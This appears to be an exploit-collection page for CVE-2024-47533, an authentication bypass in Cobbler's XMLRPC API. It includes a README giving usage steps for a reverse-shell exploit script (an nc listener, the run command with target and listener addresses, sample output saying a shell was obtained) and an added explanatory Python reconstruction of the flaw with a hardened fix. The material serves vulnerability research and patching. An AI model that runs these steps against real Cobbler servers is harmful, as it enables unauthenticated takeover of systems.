
CVE-2024-47533 PoC — Cobbler Authorization Vulnerability

Associated Vulnerability
Title: Cobbler authorization vulnerability (CVE-2024-47533)
Description: Cobbler is an open-source network installation server suite from the Cobbler project, used mainly to set up Linux network installation environments quickly. Cobbler versions 3.0.0 through 3.2.3, and versions before 3.3.7, contain an authorization vulnerability caused by improper authentication, which allows anyone who can reach the server over the network to take full control of it.
Readme
# CVE-2024-47533 – Cobbler XMLRPC Authentication Bypass → Reverse Shell (Unauthenticated RCE)

## 📌 Summary
This repository contains a **Proof-of-Concept (PoC) exploit** for **CVE-2024-47533**,  
a critical authentication bypass in Cobbler's XMLRPC API that leads to **unauthenticated remote code execution (RCE)**.

The exploit leverages a flaw in the XMLRPC API's `login()` method to bypass authentication and then injects a reverse shell command via `background_import()`.

---

## ⚠️ Disclaimer
This tool is intended for **educational, research, and authorized penetration testing only**.  
Do **NOT** use it on systems you do not own or have explicit written permission to test.  
The author assumes **no liability** for misuse or damages.

---

## 🛠 Technical Details
- **Vulnerability Type:** Authentication Bypass → RCE  
- **Affected Component:** Cobbler XMLRPC API  
- **Attack Vector:** Network  
- **Privileges Required:** None  
- **User Interaction:** None  

**Root Cause:**  
`utils.get_shared_secret()` incorrectly returns `-1` due to mishandling file reads in binary mode with an encoding, allowing authentication with an empty username and `-1` as the password.
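As an added illustration that is not code from this repository or from the Cobbler project, the following Python reconstructs the root-cause pattern described above: a secret reader opens the file in binary mode while also passing `encoding=`, which Python rejects with `ValueError`; a catch-all `except` turns that failure into the sentinel `-1`, so a login check that compares the supplied password against the reader's return value accepts `-1` whenever the read fails. A fail-closed reader and login check are shown beside it. The function names, the `web.ss` file name, the bare-except shape and the exact login comparison are assumptions made for this example, not Cobbler's source, and the hardened version illustrates the general lesson (a read failure must never collapse into a value that user input can match) rather than the project's actual patch.

```python
"""Reconstructed illustration of the CVE-2024-47533 root-cause pattern.

Example code written for this page; not Cobbler's implementation. The file
name, function names and the login comparison are assumptions.
"""
import os
import secrets
import tempfile
from typing import Union


class SharedSecretUnavailable(Exception):
    """Raised when the shared secret cannot be read; callers must fail closed."""


def get_shared_secret_vulnerable(path: str) -> Union[str, int]:
    # Assumed shape of the buggy reader. open() with a binary mode and an
    # encoding raises ValueError before the file is even touched; the
    # catch-all except hides that and returns the sentinel -1.
    try:
        with open(path, "rb", encoding="utf-8") as fd:  # raises ValueError
            data = fd.read()
    except Exception:
        return -1
    return data.decode("utf-8").strip()


def login_vulnerable(user: str, password, path: str) -> bool:
    # Assumed shape of the shared-secret login path: an empty username plus a
    # password equal to the secret grants access. Because the "secret" is the
    # sentinel -1, the comparison also succeeds for the integer -1.
    return user == "" and password == get_shared_secret_vulnerable(path)


def get_shared_secret_hardened(path: str) -> str:
    # Text mode with an explicit encoding; read errors propagate instead of
    # being mapped onto a value that could collide with caller input.
    with open(path, "r", encoding="utf-8") as fd:
        secret = fd.read().strip()
    if not secret:
        raise SharedSecretUnavailable(f"{path} is empty")
    return secret


def login_hardened(user: str, password, path: str) -> bool:
    # Fail closed: wrong type, unreadable secret, or empty secret all deny.
    if user != "" or not isinstance(password, str):
        return False
    try:
        secret = get_shared_secret_hardened(path)
    except (OSError, SharedSecretUnavailable):
        return False
    return secrets.compare_digest(password.encode("utf-8"), secret.encode("utf-8"))


def run_demo() -> dict:
    """Exercise both readers against a constructed secret file in a temp dir."""
    workdir = tempfile.mkdtemp()
    path = os.path.join(workdir, "web.ss")  # assumed file name
    with open(path, "w", encoding="utf-8") as fd:
        fd.write("constructed-secret-value\n")  # constructed sample secret
    missing = os.path.join(workdir, "does-not-exist")
    return {
        "vulnerable_secret": get_shared_secret_vulnerable(path),
        "vulnerable_accepts_minus_one": login_vulnerable("", -1, path),
        "hardened_secret": get_shared_secret_hardened(path),
        "hardened_rejects_minus_one": not login_hardened("", -1, path),
        "hardened_accepts_real_secret": login_hardened("", "constructed-secret-value", path),
        "hardened_rejects_missing_file": not login_hardened("", "anything", missing),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The vulnerable reader returns `-1` even though the secret file exists and is readable, because the `open()` call itself is invalid; any caller that treats the return value as the secret will then accept whatever equals that sentinel. The hardened path uses a typed, constant-time comparison and denies on every error, so a broken read produces a login failure (and an exception worth alerting on) rather than an open door.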

**Impact:**  
An attacker can:
- Gain admin-level API access
- Inject arbitrary system commands into Cobbler templates
- Spawn a reverse shell on the target

---

## 🚀 Usage

### 1️⃣ Clone the repository
```bash
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
```

### 2️⃣ Set up a listener
On your attacking machine:
```bash
nc -lvnp 4444
```

### 3️⃣ Run the exploit
```bash
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
```

**Example:**
```bash
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
```

---

## 📂 File Structure
```
.
├── CVE-2024-47533.py  # Reverse shell exploit script
└── README.md          # Documentation
```

---

## 📸 Example Output
```plaintext
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.
```

---

## 🧑‍💻 Author
**00xCanelo**  
[GitHub Profile](https://github.com/00xCanelo)

---

## 📚 References
- [NVD: CVE-2024-47533](https://nvd.nist.gov/vuln/detail/CVE-2024-47533)
- [Cobbler Project GitHub](https://github.com/cobbler/cobbler)
File Snapshot

[4.0K] /data/pocs/a2833d1512c0ab076c2a3951258ddd1a22347b54
├── [6.4K] CVE-2024-47533.py
└── [2.4K] README.md

0 directories, 2 files